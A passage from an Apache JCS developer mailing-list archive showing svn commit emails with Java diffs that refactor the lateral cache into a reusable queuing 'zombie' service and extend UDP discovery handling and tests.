discoveredService2.setServicePort( 1000 ); discoveredService2.setLastHearFromTime( 500 ); @@ -105,7 +171,7 @@ .contains( discoveredService ) ); assertTrue( "Service should be in the listener list.", discoveryListener.discoveredServices .contains( discoveredService ) ); - + Iterator it = service.getDiscoveredServices().iterator(); // need to update the time this sucks. add has no effect convert to a map while ( it.hasNext() ) @@ -115,8 +181,14 @@ { assertEquals( "The match should have the new last heard from time.", service1.getLastHearFromTime(), discoveredService2.getLastHearFromTime() ); + assertEquals( "The names should be updated.", service1.getCacheNames() + "", differentCacheNames + "" ); } - } + } + // the mock has a list from all add calls. + // it should have been called when the list changed. + assertEquals( "Mock should have been called twice.", 2, discoveryListener.discoveredServices.size() ); + assertEquals( "The second mock listener add should be discoveredService2", discoveredService2, + discoveryListener.discoveredServices.get( 1 ) ); } /** Verify that the list is updated. */ @@ -153,5 +225,5 @@ .contains( discoveredService ) ); assertFalse( "Service should not be in the listener list.", discoveryListener.discoveredServices .contains( discoveredService ) ); - } + } } --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 18:27:14 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96560 invoked from network); 23 Jul 2009 18:27:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 18:27:14 -0000 Received: (qmail 37136 invoked by uid 500); 23 Jul 2009 18:28:19 -0000 Delivered-To: [email protected] Received: (qmail 37109 invoked by uid 500); 23 Jul 2009 18:28:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 37099 invoked by uid 500); 23 Jul 2009 18:28:19 -0000 Delivered-To: [email protected] Received: (qmail 37096 invoked by uid 500); 23 Jul 2009 18:28:19 -0000 Delivered-To: [email protected] Received: (qmail 37093 invoked by uid 99); 23 Jul 2009 18:28:19 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 18:28:19 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 18:28:06 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 178AB2388866; Thu, 23 Jul 2009 18:27:44 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r797178 [1/2] - in /jakarta/jcs/trunk/src: conf/ java/org/apache/jcs/auxiliary/lateral/ java/org/apache/jcs/auxiliary/lateral/behavior/ java/org/apache/jcs/auxiliary/lateral/socket/tcp/ java/org/apache/jcs/auxiliary/lateral/socket/tcp/behav... Date: Thu, 23 Jul 2009 18:27:42 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: asmuts Date: Thu Jul 23 18:27:41 2009 New Revision: 797178 URL: http://svn.apache.org/viewvc?rev=797178&view=rev Log: Made a reusable queuing zombie service from the one in the remote cache. Made the lateral cache use it. Finished, for now, the UDP discovery move into a reusable spot. Lateral TCP is now fully functional with the new discovery service. Added: jakarta/jcs/trunk/src/java/org/apache/jcs/engine/ZombieCacheServiceNonLocal.java jakarta/jcs/trunk/src/java/org/apache/jcs/engine/behavior/ICacheServiceNonLocal.java jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerUnitTest.java jakarta/jcs/trunk/src/test/org/apache/jcs/engine/MockCacheServiceNonLocal.java jakarta/jcs/trunk/src/test/org/apache/jcs/engine/ZombieCacheServiceNonLocalUnitTest.java Modified: jakarta/jcs/trunk/src/conf/log4j.properties jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCache.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheAttributes.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWait.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheRestore.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/ZombieLateralCacheService.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/behavior/ILateralCacheAttributes.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/behavior/ILateralCacheService.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerManager.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPService.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/behavior/ITCPLateralCacheAttributes.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/remote/ZombieRemoteCacheService.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/remote/behavior/IRemoteCacheService.java jakarta/jcs/trunk/src/java/org/apache/jcs/engine/behavior/ICacheService.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySenderThread.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java jakarta/jcs/trunk/src/test-conf/TestTCPLateralRemoveFilter.ccf jakarta/jcs/trunk/src/test-conf/log4j.properties jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPFilterRemoveHashCodeUnitTest.java jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java Modified: jakarta/jcs/trunk/src/conf/log4j.properties URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/conf/log4j.properties?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/conf/log4j.properties (original) +++ jakarta/jcs/trunk/src/conf/log4j.properties Thu Jul 23 18:27:41 2009 @@ -54,15 +54,16 @@ # log4j.category.org.apache.jcs.auxiliary=INFO # log4j.category.org.apache.jcs.auxiliary.disk=WARN,WF -log4j.category.org.apache.jcs.auxiliary.lateral=INFO -log4j.category.org.apache.jcs.auxiliary.lateral.javagroups=INFO +# log4j.category.org.apache.jcs.auxiliary.lateral=INFO +# log4j.category.org.apache.jcs.auxiliary.lateral.javagroups=INFO # log4j.category.org.apache.jcs.auxiliary.lateral.xmlrpc=INFO -log4j.category.org.apache.jcs.auxiliary.remote=INFO +# log4j.category.org.apache.jcs.auxiliary.remote=INFO # log4j.category.org.apache.jcs.auxiliary.remote.RemoteCacheFailoverRunner=INFO # log4j.category.org.apache.jcs.auxiliary.remote.RemoteCacheListener=DEBUG # log4j.category.org.apache.jcs.auxiliary.remote.RemoteCacheManager=INFO # log4j.category.org.apache.jcs.auxiliary.remote.server.RemoteCacheServer=DEBUG # log4j.category.org.apache.jcs.auxiliary.remote.server=INFO # log4j.category.org.apache.jcs.utils=WARN,WF +# log4j.category.org.apache.jcs.utils.discovery=DEBUG log4j.category.org.apache.jcs.utils=INFO Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCache.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCache.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCache.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCache.java Thu Jul 23 18:27:41 2009 @@ -53,13 +53,13 @@ private final static Log log = LogFactory.getLog( LateralCache.class ); /** generalize this, use another interface */ - private ILateralCacheAttributes cattr; + private ILateralCacheAttributes lateralCacheAttribures; /** The region name */ final String cacheName; /** either http, socket.udp, or socket.tcp can set in config */ - private ILateralCacheService lateral; + private ILateralCacheService lateralCacheService; /** Monitors the connection. */ private LateralCacheMonitor monitor; @@ -74,8 +74,8 @@ public LateralCache( ILateralCacheAttributes cattr, ILateralCacheService lateral, LateralCacheMonitor monitor ) { this.cacheName = cattr.getCacheName(); - this.cattr = cattr; - this.lateral = lateral; + this.lateralCacheAttribures = cattr; + this.lateralCacheService = lateral; this.monitor = monitor; } @@ -84,10 +84,10 @@ * <p> * @param cattr */ - protected LateralCache( ILateralCacheAttributes cattr ) + public LateralCache( ILateralCacheAttributes cattr ) { this.cacheName = cattr.getCacheName(); - this.cattr = cattr; + this.lateralCacheAttribures = cattr; } /** @@ -103,20 +103,20 @@ { if ( log.isDebugEnabled() ) { - log.debug( "update: lateral = [" + lateral + "], " + "LateralCacheInfo.listenerId = " + log.debug( "update: lateral = [" + lateralCacheService + "], " + "LateralCacheInfo.listenerId = " + LateralCacheInfo.listenerId ); } - lateral.update( ce, LateralCacheInfo.listenerId ); + lateralCacheService.update( ce, LateralCacheInfo.listenerId ); } catch ( NullPointerException npe ) { - log.error( "Failure updating lateral. lateral = " + lateral, npe ); - handleException( npe, "Failed to put [" + ce.getKey() + "] to " + ce.getCacheName() + "@" + cattr ); + log.error( "Failure updating lateral. lateral = " + lateralCacheService, npe ); + handleException( npe, "Failed to put [" + ce.getKey() + "] to " + ce.getCacheName() + "@" + lateralCacheAttribures ); return; } catch ( Exception ex ) { - handleException( ex, "Failed to put [" + ce.getKey() + "] to " + ce.getCacheName() + "@" + cattr ); + handleException( ex, "Failed to put [" + ce.getKey() + "] to " + ce.getCacheName() + "@" + lateralCacheAttribures ); } } @@ -132,18 +132,18 @@ { ICacheElement obj = null; - if ( this.cattr.getPutOnlyMode() ) + if ( this.lateralCacheAttribures.getPutOnlyMode() ) { return null; } try { - obj = lateral.get( cacheName, key ); + obj = lateralCacheService.get( cacheName, key ); } catch ( Exception e ) { log.error( e ); - handleException( e, "Failed to get [" + key + "] from " + cattr.getCacheName() + "@" + cattr ); + handleException( e, "Failed to get [" + key + "] from " + lateralCacheAttribures.getCacheName() + "@" + lateralCacheAttribures ); } return obj; } @@ -159,18 +159,18 @@ { Map elements = new HashMap(); - if ( this.cattr.getPutOnlyMode() ) + if ( this.lateralCacheAttribures.getPutOnlyMode() ) { return Collections.EMPTY_MAP; } try { - elements = lateral.getMatching( cacheName, pattern ); + elements = lateralCacheService.getMatching( cacheName, pattern ); } catch ( Exception e ) { log.error( e ); - handleException( e, "Failed to getMatching [" + pattern + "] from " + cattr.getCacheName() + "@" + cattr ); + handleException( e, "Failed to getMatching [" + pattern + "] from " + lateralCacheAttribures.getCacheName() + "@" + lateralCacheAttribures ); } return elements; } @@ -211,10 +211,21 @@ /** * @param groupName * @return A set of group keys. + * @throws IOException */ public Set getGroupKeys( String groupName ) + throws IOException { - return lateral.getGroupKeys( cacheName, groupName ); + try + { + return lateralCacheService.getGroupKeys( cacheName, groupName ); + } + catch ( Exception ex ) + { + handleException( ex, "Failed to remove groupName [" + groupName + "] from " + lateralCacheAttribures.getCacheName() + "@" + + lateralCacheAttribures ); + } + return Collections.EMPTY_SET; } /** @@ -235,11 +246,11 @@ try { - lateral.remove( cacheName, key, LateralCacheInfo.listenerId ); + lateralCacheService.remove( cacheName, key, LateralCacheInfo.listenerId ); } catch ( Exception ex ) { - handleException( ex, "Failed to remove " + key + " from " + cattr.getCacheName() + "@" + cattr ); + handleException( ex, "Failed to remove " + key + " from " + lateralCacheAttribures.getCacheName() + "@" + lateralCacheAttribures ); } return false; } @@ -255,11 +266,11 @@ { try { - lateral.removeAll( cacheName, LateralCacheInfo.listenerId ); + lateralCacheService.removeAll( cacheName, LateralCacheInfo.listenerId ); } catch ( Exception ex ) { - handleException( ex, "Failed to remove all from " + cattr.getCacheName() + "@" + cattr ); + handleException( ex, "Failed to remove all from " + lateralCacheAttribures.getCacheName() + "@" + lateralCacheAttribures ); } } @@ -279,13 +290,13 @@ // any. try { - lateral.dispose( this.cattr.getCacheName() ); + lateralCacheService.dispose( this.lateralCacheAttribures.getCacheName() ); // Should remove connection } catch ( Exception ex ) { log.error( "Couldn't dispose", ex ); - handleException( ex, "Failed to dispose " + cattr.getCacheName() ); + handleException( ex, "Failed to dispose " + lateralCacheAttribures.getCacheName() ); } } @@ -296,7 +307,7 @@ */ public int getStatus() { - return this.lateral instanceof IZombie ? CacheConstants.STATUS_ERROR : CacheConstants.STATUS_ALIVE; + return this.lateralCacheService instanceof IZombie ? CacheConstants.STATUS_ERROR : CacheConstants.STATUS_ALIVE; } /** @@ -341,7 +352,7 @@ { log.error( "Disabling lateral cache due to error " + msg, ex ); - lateral = new ZombieLateralCacheService(); + lateralCacheService = new ZombieLateralCacheService( lateralCacheAttribures.getZombieQueueMaxSize() ); // may want to flush if region specifies // Notify the cache monitor about the error, and kick off the recovery // process. @@ -358,17 +369,33 @@ /** * Replaces the current remote cache service handle with the given handle. * <p> - * @param lateral + * @param restoredLateral */ - public void fixCache( ILateralCacheService lateral ) + public void fixCache( ILateralCacheService restoredLateral ) { - if ( lateral != null ) + if ( this.lateralCacheService != null && this.lateralCacheService instanceof ZombieLateralCacheService ) { - this.lateral = lateral; + ZombieLateralCacheService zombie = (ZombieLateralCacheService) this.lateralCacheService; + this.lateralCacheService = restoredLateral; + try + { + zombie.propagateEvents( restoredLateral ); + } + catch ( Exception e ) + { + try + { + handleException( e, "Problem propagating events from Zombie Queue to new Lateral Service." ); + } + catch ( IOException e1 ) + { + // swallow, since this is just expected kick back. Handle always throws + } + } } else { - log.warn( "Fix cache called with null lateral." ); + this.lateralCacheService = restoredLateral; } return; } @@ -388,7 +415,7 @@ */ public AuxiliaryCacheAttributes getAuxiliaryCacheAttributes() { - return cattr; + return lateralCacheAttribures; } /** @@ -398,8 +425,8 @@ { StringBuffer buf = new StringBuffer(); buf.append( "\n LateralCache " ); - buf.append( "\n Cache Name [" + cattr.getCacheName() + "]" ); - buf.append( "\n cattr = [" + cattr + "]" ); + buf.append( "\n Cache Name [" + lateralCacheAttribures.getCacheName() + "]" ); + buf.append( "\n cattr = [" + lateralCacheAttribures + "]" ); return buf.toString(); } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheAttributes.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheAttributes.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheAttributes.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheAttributes.java Thu Jul 23 18:27:41 2009 @@ -68,6 +68,9 @@ */ private boolean receive = DEFAULT_RECEIVE; + /** If the primary fails, we will queue items before reconnect. This limits the number of items that can be queued. */ + private int zombieQueueMaxSize = DEFAULT_ZOMBIE_QUEUE_MAX_SIZE; + /** * Sets the httpServer attribute of the LateralCacheAttributes object * <P> @@ -280,6 +283,28 @@ } /** + * The number of elements the zombie queue will hold. This queue is used to store events if we + * loose our connection with the server. + * <p> + * @param zombieQueueMaxSize The zombieQueueMaxSize to set. + */ + public void setZombieQueueMaxSize( int zombieQueueMaxSize ) + { + this.zombieQueueMaxSize = zombieQueueMaxSize; + } + + /** + * The number of elements the zombie queue will hold. This queue is used to store events if we + * loose our connection with the server. + * <p> + * @return Returns the zombieQueueMaxSize. + */ + public int getZombieQueueMaxSize() + { + return zombieQueueMaxSize; + } + + /** * @return debug string. */ public String toString() Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWait.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWait.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWait.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWait.java Thu Jul 23 18:27:41 2009 @@ -234,7 +234,16 @@ */ public Set getGroupKeys( String groupName ) { - return cache.getGroupKeys( groupName ); + try + { + return cache.getGroupKeys( groupName ); + } + catch ( IOException ex ) + { + log.error( ex ); + eventQueue.destroy(); + } + return Collections.EMPTY_SET; } /** Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheRestore.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheRestore.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheRestore.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheRestore.java Thu Jul 23 18:27:41 2009 @@ -92,6 +92,5 @@ lcm.fixCaches( (ILateralCacheService) lateralObj, (ILateralCacheObserver) lateralObj ); String msg = "Lateral connection resumed."; log.info( msg ); - log.debug( msg ); } } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/ZombieLateralCacheService.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/ZombieLateralCacheService.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/ZombieLateralCacheService.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/ZombieLateralCacheService.java Thu Jul 23 18:27:41 2009 @@ -19,79 +19,29 @@ * under the License. */ -import java.io.Serializable; -import java.util.Collections; -import java.util.Map; -import java.util.Set; - import org.apache.jcs.auxiliary.lateral.behavior.ILateralCacheService; -import org.apache.jcs.engine.ZombieCacheService; -import org.apache.jcs.engine.behavior.ICacheElement; +import org.apache.jcs.engine.ZombieCacheServiceNonLocal; /** * The ZombieLateralCacheService is used as a facade when the lateral is not available. It balks * when the lateral is in error. When lateral service is restored, this is replaced by a live * facade. + * <p> + * Extends a queing non-local service. */ public class ZombieLateralCacheService - extends ZombieCacheService + extends ZombieCacheServiceNonLocal implements ILateralCacheService { - /** - * Balks - * <p> - * @param item - * @param listenerId - */ - public void update( ICacheElement item, long listenerId ) - { - // zombies have no inner life - } - - /** - * Balks - * <p> - * @param cacheName - * @param key - * @param listenerId - */ - public void remove( String cacheName, Serializable key, long listenerId ) - { - // zombies have no inner life - } - - /** - * Balks - * <p> - * @param cacheName - * @param listenerId - */ - public void removeAll( String cacheName, long listenerId ) - { - // zombies have no inner life - } - - /** - * Balks - * <p> - * @param cacheName - * @param groupName - * @return empty set - */ - public Set getGroupKeys( String cacheName, String groupName ) - { - return Collections.EMPTY_SET; - } + // backwards compatibility /** - * The service does not get via this method, so this return empty. + * Sets the maximum number of items that will be allowed on the queue. * <p> - * @param cacheName - * @param pattern - * @return Collections.EMPTY_MAP. + * @param maxQueueSize */ - public Map getMatching( String cacheName, String pattern ) + public ZombieLateralCacheService( int maxQueueSize ) { - return Collections.EMPTY_MAP; + super( maxQueueSize ); } } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/behavior/ILateralCacheAttributes.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/behavior/ILateralCacheAttributes.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/behavior/ILateralCacheAttributes.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/behavior/ILateralCacheAttributes.java Thu Jul 23 18:27:41 2009 @@ -45,6 +45,12 @@ final static int XMLRPC = 4; /** + * The number of elements the zombie queue will hold. This queue is used to store events if we + * loose our connection with the server. + */ + public static final int DEFAULT_ZOMBIE_QUEUE_MAX_SIZE = 1000; + + /** * Sets the httpServer attribute of the ILateralCacheAttributes object * <p> * @param val The new httpServer value @@ -171,7 +177,23 @@ * not configured for the lateral but another is. And if cache B has region R1 configured for * lateral distribution, A will get messages for R1 but not send them. * <p> - * @return true if we should have a listener conenction + * @return true if we should have a listener connection */ public boolean isReceive(); + + /** + * The number of elements the zombie queue will hold. This queue is used to store events if we + * loose our connection with the server. + * <p> + * @param zombieQueueMaxSize The zombieQueueMaxSize to set. + */ + public void setZombieQueueMaxSize( int zombieQueueMaxSize ); + + /** + * The number of elements the zombie queue will hold. This queue is used to store events if we + * loose our connection with the server. + * <p> + * @return Returns the zombieQueueMaxSize. + */ + public int getZombieQueueMaxSize(); } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/behavior/ILateralCacheService.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/behavior/ILateralCacheService.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/behavior/ILateralCacheService.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/behavior/ILateralCacheService.java Thu Jul 23 18:27:41 2009 @@ -19,65 +19,11 @@ * under the License. */ -import java.io.IOException; -import java.io.Serializable; -import java.util.Map; -import java.util.Set; - -import org.apache.jcs.engine.behavior.ICacheElement; -import org.apache.jcs.engine.behavior.ICacheService; +import org.apache.jcs.engine.behavior.ICacheServiceNonLocal; /** Used to retrieve and update the lateral cache. */ public interface ILateralCacheService - extends ICacheService + extends ICacheServiceNonLocal { - /** - * Puts a cache item to the cache. - * <p> - * @param item - * @param requesterId - * @throws IOException - */ - void update( ICacheElement item, long requesterId ) - throws IOException; - - /** - * Removes the given key from the specified cache. - * <p> - * @param cacheName - * @param key - * @param requesterId - * @throws IOException - */ - void remove( String cacheName, Serializable key, long requesterId ) - throws IOException; - - /** - * Remove all keys from the sepcified cache. - * <p> - * @param cacheName - * @param requesterId - * @throws IOException - */ - void removeAll( String cacheName, long requesterId ) - throws IOException; - - /** - * @param cacheName - * @param groupName - * @return keys - */ - Set getGroupKeys( String cacheName, String groupName ); - - /** - * Gets multiple items from the cache matching the pattern. - * <p> - * @param cacheName - * @param pattern - * @return a map of Serializable key to ICacheElement element, or an empty map if there is no - * data in cache matching the pattern. - * @throws IOException - */ - Map getMatching( String cacheName, String pattern ) - throws IOException; + // backwards compatibility } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheManager.java Thu Jul 23 18:27:41 2009 @@ -70,7 +70,7 @@ protected static Map instances = Collections.synchronizedMap( new HashMap() ); /** ITCPLateralCacheAttributes */ - protected ITCPLateralCacheAttributes lca; + protected ITCPLateralCacheAttributes lateralCacheAttribures; /** number of clients, we can remove this. */ private int clients; @@ -160,14 +160,14 @@ private LateralTCPCacheManager( ITCPLateralCacheAttributes lcaA, ICompositeCacheManager cacheMgr, ICacheEventLogger cacheEventLogger, IElementSerializer elementSerializer ) { - this.lca = lcaA; + this.lateralCacheAttribures = lcaA; this.cacheMgr = cacheMgr; this.cacheEventLogger = cacheEventLogger; this.elementSerializer = elementSerializer; if ( log.isDebugEnabled() ) { - log.debug( "Creating lateral cache service, lca = " + this.lca ); + log.debug( "Creating lateral cache service, lca = " + this.lateralCacheAttribures ); } // Create the service @@ -175,9 +175,9 @@ { if ( log.isInfoEnabled() ) { - log.info( "Creating TCP service, lca = " + this.lca ); + log.info( "Creating TCP service, lca = " + this.lateralCacheAttribures ); } - this.lateralService = new LateralTCPService( this.lca ); + this.lateralService = new LateralTCPService( this.lateralCacheAttribures ); if ( this.lateralService == null ) { @@ -195,7 +195,7 @@ // "zombie" services. log.error( "Failure, lateral instance will use zombie service", ex ); - this.lateralService = new ZombieLateralCacheService(); + this.lateralService = new ZombieLateralCacheService( lateralCacheAttribures.getZombieQueueMaxSize() ); this.lateralWatch = new LateralCacheWatchRepairable(); this.lateralWatch.setCacheWatch( new ZombieLateralCacheWatch() ); @@ -242,7 +242,7 @@ lateralNoWait = (LateralCacheNoWait) caches.get( cacheName ); if ( lateralNoWait == null ) { - LateralCacheAttributes attr = (LateralCacheAttributes) lca.copy(); + LateralCacheAttributes attr = (LateralCacheAttributes) lateralCacheAttribures.copy(); attr.setCacheName( cacheName ); LateralCache cache = new LateralCache( attr, this.lateralService, monitor ); @@ -262,7 +262,7 @@ if ( log.isInfoEnabled() ) { - log.info( "Created LateralCacheNoWait for [" + lca + "] LateralCacheNoWait = [" + lateralNoWait + log.info( "Created LateralCacheNoWait for [" + lateralCacheAttribures + "] LateralCacheNoWait = [" + lateralNoWait + "]" ); } @@ -282,11 +282,11 @@ private void addListenerIfNeeded( String cacheName ) { // don't create a listener if we are not receiving. - if ( lca.isReceive() ) + if ( lateralCacheAttribures.isReceive() ) { try { - addLateralCacheListener( cacheName, LateralTCPListener.getInstance( lca, cacheMgr ) ); + addLateralCacheListener( cacheName, LateralTCPListener.getInstance( lateralCacheAttribures, cacheMgr ) ); } catch ( IOException ioe ) { @@ -324,7 +324,7 @@ Object service = null; try { - service = new LateralTCPService( lca ); + service = new LateralTCPService( lateralCacheAttribures ); } catch ( Exception ex ) { @@ -335,7 +335,8 @@ } /** - * Shutsdown the lateral. + * Shuts down the lateral sender. This does not shutdown the listener. This can be called if the + * end point is taken out of service. */ public void shutdown() { Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java Thu Jul 23 18:27:41 2009 @@ -3,8 +3,10 @@ import java.util.ArrayList; import java.util.Collections; import java.util.HashMap; +import java.util.HashSet; import java.util.Iterator; import java.util.Map; +import java.util.Set; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; @@ -20,7 +22,7 @@ import org.apache.jcs.utils.discovery.behavior.IDiscoveryListener; /** - * This knows how to add and remove discovered services. + * This knows how to add and remove discovered services. It observers UDP discovery events. * <p> * We can have one listener per region, or one shared by all regions. */ @@ -36,6 +38,12 @@ */ private Map facades = Collections.synchronizedMap( new HashMap() ); + /** + * List of regions that are configured differently here than on another server. We keep track of + * this to limit the amount of info logging. + */ + private Set knownDifferentlyConfiguredRegions = Collections.synchronizedSet( new HashSet() ); + /** The cache manager. */ private ICompositeCacheManager cacheMgr; @@ -66,21 +74,51 @@ * This adds nowaits to a facade for the region name. If the region has no facade, then it is * not configured to use the lateral cache, and no facade will be created. * <p> + * @param cacheName - the region name * @param facade - facade (for region) => multiple lateral clients. - * @param cacheName * @return true if the facade was not already registered. */ public synchronized boolean addNoWaitFacade( String cacheName, LateralCacheNoWaitFacade facade ) { - boolean isNew = !facades.containsKey( cacheName ); + boolean isNew = !containsNoWaitFacade( cacheName ); // override or put anew, it doesn't matter facades.put( cacheName, facade ); + knownDifferentlyConfiguredRegions.remove( cacheName ); return isNew; } /** + * Allows us to see if the facade is present. + * <p> + * @param cacheName - facades are for a region + * @return do we contain the no wait. true if so + */ + public boolean containsNoWaitFacade( String cacheName ) + { + return facades.containsKey( cacheName ); + } + + /** + * Allows us to see if the facade is present and if it has the no wait. + * <p> + * @param cacheName - facades are for a region + * @param noWait - is this no wait in the facade + * @return do we contain the no wait. true if so + */ + public boolean containsNoWait( String cacheName, LateralCacheNoWait noWait ) + { + LateralCacheNoWaitFacade facade = (LateralCacheNoWaitFacade) facades.get( noWait.getCacheName() ); + if ( facade == null ) + { + return false; + } + + return facade.containsNoWait( noWait ); + } + + /** * When a broadcast is received from the UDP Discovery receiver, for each cacheName in the * message, the add no wait will be called here. To add a no wait, the facade is looked up for * this cache name. @@ -89,13 +127,15 @@ * services. * <p> * @param noWait + * @return true if we found the no wait and added it. False if the no wait was not present or it + * we already had it. */ - protected void addNoWait( LateralCacheNoWait noWait ) + protected boolean addNoWait( LateralCacheNoWait noWait ) { LateralCacheNoWaitFacade facade = (LateralCacheNoWaitFacade) facades.get( noWait.getCacheName() ); if ( log.isDebugEnabled() ) { - log.debug( "Got facade for " + noWait.getCacheName() + " = " + facade ); + log.debug( "addNoWait > Got facade for " + noWait.getCacheName() + " = " + facade ); } if ( facade != null ) @@ -105,14 +145,20 